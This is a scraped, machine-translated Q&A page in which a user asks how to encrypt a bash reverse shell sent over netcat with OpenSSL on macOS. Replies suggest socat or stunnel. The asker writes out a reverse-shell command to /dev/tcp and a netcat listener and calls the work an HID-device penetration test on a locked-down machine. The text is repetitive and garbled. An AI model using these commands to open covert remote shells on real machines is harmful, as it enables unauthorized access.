Macos 用OpenSSL加密Netcat数据_Macos_Bash_Encryption_Openssl_Netcat

Macos 用OpenSSL加密Netcat数据

macos bash encryption openssl

Macos 用OpenSSL加密Netcat数据,macos,bash,encryption,openssl,netcat,Macos,Bash,Encryption,Openssl,Netcat,因此，我有一个由netcat管理的基本通信流。例如，用户可以创建bashshell并将控制转发到端口5555处的localhost。如何通过OpenSSL实现对称加密的连接？我只能使用OSX机器上安装的工具创建Shell 捕壳使用OpenSSL加密数据使用OpenSSL解密数据这正是我想要的 bash -i & | openssl -e > /dev/tcp/localhost/5555 0>&1 nc -l -p 5555 | openssl -d 根据您

因此，我有一个由netcat管理的基本通信流。例如，用户可以创建bashshell并将控制转发到端口5555处的localhost。如何通过OpenSSL实现对称加密的连接？我只能使用OSX机器上安装的工具

创建Shell

捕壳

使用OpenSSL加密数据

使用OpenSSL解密数据

这正是我想要的

bash -i & | openssl -e > /dev/tcp/localhost/5555 0>&1
nc -l -p 5555 | openssl -d

根据您评论中的其他信息，安装MacPorts，并尝试使用带端口的socat或stunnel

dtpwmbp:~ pwadas$ uname -a ; sudo port list |egrep -i socat\|stunnel
Darwin dtpwmbp 12.4.0 Darwin Kernel Version 12.4.0: Wed May  1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
stunnel                        @4.47           security/stunnel
socat                          @1.7.2.1        sysutils/socat
dtpwmbp:~ pwadas$

根据您评论中的其他信息，安装MacPorts，并尝试使用带端口的socat或stunnel

dtpwmbp:~ pwadas$ uname -a ; sudo port list |egrep -i socat\|stunnel
Darwin dtpwmbp 12.4.0 Darwin Kernel Version 12.4.0: Wed May  1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
stunnel                        @4.47           security/stunnel
socat                          @1.7.2.1        sysutils/socat
dtpwmbp:~ pwadas$

使用socat怎么样，不也算数吗？特朗内尔？openssl本身有“连接”、“s_服务器”和“s_客户端”选项，可以将数据放在其标准数据上。嗯，所有这些选择都是完美的。不幸的是，我只能使用OSX机器上安装的工具。使用socat怎么样，不也算数吗？特朗内尔？openssl本身有“连接”、“s_服务器”和“s_客户端”选项，可以将数据放在其标准数据上。嗯，所有这些选择都是完美的。不幸的是，我只能使用OSX机器上安装的工具。脱离主题，但你真的应该接受一些幻想训练。

dtpwmbp

-可能是（DT）？（P） iotr（W）adas（M）ac（B）ook（Pro）-但很抱歉，对于MAC电脑来说，这是一个可怕的名字…；）：）哈哈，我只有一台mac供私人使用，我不打算再有更多了。我也叫我的猫“猫”，你知道摩托车也有自己的名字；-）DT是一个昵称：）。jm666说。可能至少是jm686:p这将涉及“安装”某些东西。对不起，我是一个**lol中的痛苦。这是一个通过HID设备进行的渗透测试，用户没有安装任何东西的权限。如果是渗透测试，为什么你关心加密？真正的攻击者不会。而且，从理论上讲，您仍然可以选择“安装”基于shell的内容，而无需升级许可，或者如果您能够获得shell访问权限，可以从其他地方复制预编译的内容。问题可能应该转移到superuser.com、security.stackexchange.com或apple.stackexchange.com主题，但你真的应该接受一些幻想训练。

dtpwmbp

-可能是（DT）？（P） iotr（W）adas（M）ac（B）ook（Pro）-但很抱歉，对于MAC电脑来说，这是一个可怕的名字…；）：）哈哈，我只有一台mac供私人使用，我不打算再有更多了。我也叫我的猫“猫”，你知道摩托车也有自己的名字；-）DT是一个昵称：）。jm666说。可能至少是jm686:p这将涉及“安装”某些东西。对不起，我是一个**lol中的痛苦。这是一个通过HID设备进行的渗透测试，用户没有安装任何东西的权限。如果是渗透测试，为什么你关心加密？真正的攻击者不会。而且，从理论上讲，您仍然可以选择“安装”基于shell的东西，而无需升级许可，或者如果您能够获得shell访问权限，可以从其他地方将其复制到预编译中。问题可能应该转移到superuser.com、security.stackexchange.com或apple.stackexchange.com

openssl aes-256-cbc -salt -a -d -in encrypted.txt -out plaintext.txt

bash -i & | openssl -e > /dev/tcp/localhost/5555 0>&1
nc -l -p 5555 | openssl -d

dtpwmbp:~ pwadas$ uname -a ; sudo port list |egrep -i socat\|stunnel
Darwin dtpwmbp 12.4.0 Darwin Kernel Version 12.4.0: Wed May  1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
stunnel                        @4.47           security/stunnel
socat                          @1.7.2.1        sysutils/socat
dtpwmbp:~ pwadas$